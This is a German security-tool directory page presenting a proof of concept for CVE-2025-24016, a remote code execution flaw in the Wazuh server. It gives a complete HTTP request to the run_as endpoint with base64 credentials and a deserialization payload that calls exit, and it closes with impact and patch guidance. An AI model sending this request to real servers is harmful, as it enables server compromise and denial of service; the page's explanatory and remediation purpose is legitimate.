Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24016 — CVE-2025-24016: RCE in Wazuh server! Remote-Codeausführung | Kitploit
Tools/GitHubGitHub/muhammadwaseem29/cve-2025-24016
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubmuhammadwaseem29/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: RCE in Wazuh server! Remote-Codeausführung

Repository anzeigen
52vor 1 JahrNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Wazuh Remote Code Execution (RCE) - PoC

Überblick über die Schwachstelle

Dieses Repository demonstriert die Remote-Code-Execution-Schwachstelle (RCE) im Wazuh-Server, die durch eine unsichere Deserialisierung im Paket wazuh-manager eingeführt wird. Die Schwachstelle ermöglicht es entfernten Angreifern mit API-Zugriff (kompromittiertes Dashboard, Wazuh-Server im Cluster oder bestimmte Konfigurationen mit kompromittierten Agents), beliebigen Code auf dem Server auszuführen.

Betroffene Versionen

  • wazuh-manager Version >= 4.4.0
  • In Version >= 4.9.1 gepatcht

Beschreibung

Die Schwachstelle tritt in der Wazuh-API auf, wo Parameter im DistributedAPI als JSON serialisiert und mithilfe von in der Datei deserialisiert werden. Ein Angreifer kann diese Schwachstelle ausnutzen, indem er ein nicht bereinigtes Wörterbuch in DAPI-Anfragen einschleust, was zur Auswertung von beliebigem Python-Code führen kann.

as_wazuh_object
framework/wazuh/core/cluster/common.py

Die RCE kann über den Endpunkt run_as ausgelöst werden, der es dem Angreifer erlaubt, das Argument auth_context zu kontrollieren. Durch das Erstellen einer bösartigen Anfrage kann beliebiger Code auf dem Master-Server ausgeführt werden.

Proof of Concept

Um diese Schwachstelle über die Server-API auszulösen, führen Sie die folgenden Schritte aus.

PoC-Burp-Suite-Anfrage

  1. Burp-Suite-Anfrage zum Auslösen der Schwachstelle:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

Lösungsbild

  1. Erklärung der Anfrage:
  • Authorization-Header: Dies ist die Base64-kodierte Autorisierung (wazuh-wui:MyS3cr37P450r.*-).
  • Payload: Der bösartige Payload enthält die nicht bereinigte Ausnahme __unhandled_exc__, die die Ausführung von beliebigem Python-Code (exit in diesem Fall) auslöst.

Auswirkungen

  • Remote Code Execution (RCE): Diese Schwachstelle ermöglicht es Angreifern, beliebigen Code auf dem Wazuh-Server auszuführen. Betroffen sind Versionen >= 4.4.0 bis 4.9.0 (noch nicht gepatcht).
  • Möglicher Denial of Service: In diesem PoC wird die Funktion exit ausgelöst, was dazu führt, dass der Wazuh-Server heruntergefahren wird.

Gegenmaßnahmen

Zum Schutz Ihrer Systeme aktualisieren Sie auf Wazuh Version >= 4.9.1, in der dieses Problem behoben ist.

Tool herunterladen